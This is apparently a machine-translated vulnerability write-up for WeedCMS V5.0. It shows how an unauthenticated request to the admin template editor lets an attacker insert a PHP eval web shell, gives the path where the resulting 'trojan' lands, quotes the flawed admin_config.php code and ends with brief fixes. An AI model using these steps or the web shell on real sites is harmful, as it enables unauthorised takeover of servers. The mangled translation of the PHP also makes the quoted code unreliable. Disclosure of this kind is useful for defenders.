The latest cms, WeedCMS V5.0, is sent from 2011-1-1.
Html "> http://www.bkjia.com/admin.php? Action=config&do=template_edit&file=part_vote.html
After this parameter is constructed, you can directly access the edit template (part_vote.html) block without verification.
Insert a sentence <? Eval ($ _ POST [Insun]);?> The module is successfully updated, and the homepage cache is generated once accessed.
Finally, the trojan is at http: // 127.0.0.1/temps/compile/part_vote.html.php.
Fatal error: Using $ this when not in object context. $ This has no context, because this class is not instantiated.
The error does not matter. Just use the lanker link.
We recommend that you do not destroy and clear traces.
Batch powered by weedcms
The problem occurs in mongodes/admin_config.php.
// Edit the Template
If ($ do = template_edit ){
$ File = empty ($ _ GET [file])? : Trim ($ _ GET [file]);
If (get_ext ($ file )! = Html & get_ext ($ file )! = Css ){
Exit (Sorry, the parameter is invalid !);
}
$ Content = file_get_contents (templates/. $ config [site_template]./. $ file );
$ Smarty = new smarty (); smarty_header ();
$ Smarty-> assign (file, $ file );
$ Smarty-> assign (content, $ content );
$ Smarty-> display(template_info.htm );
}
// Delete an update
If ($ do = template_update ){
$ File = empty ($ _ POST [file])? : Trim ($ _ POST [file]);
$ File = templates/. $ config [site_template]./. $ file;
$ Content = empty ($ _ POST [content])? : Trim ($ _ POST [content]);
If (get_ext ($ file) = html ){
Clear_cache ($ file );
}
File_put_contents ($ file, $ content );
Message (array (text => $ language [template_update_is_success], link =>? Action = config & do = template_list ));
}
?>
The two operations are not verified, and other if operations are followed by verification. Fix and add Verification
Another problem is that the cms install may generate weak passwords. If you don't understand it or the diagram is simple, there will be problems.
Fix: Add a verification code or directly modify the background path.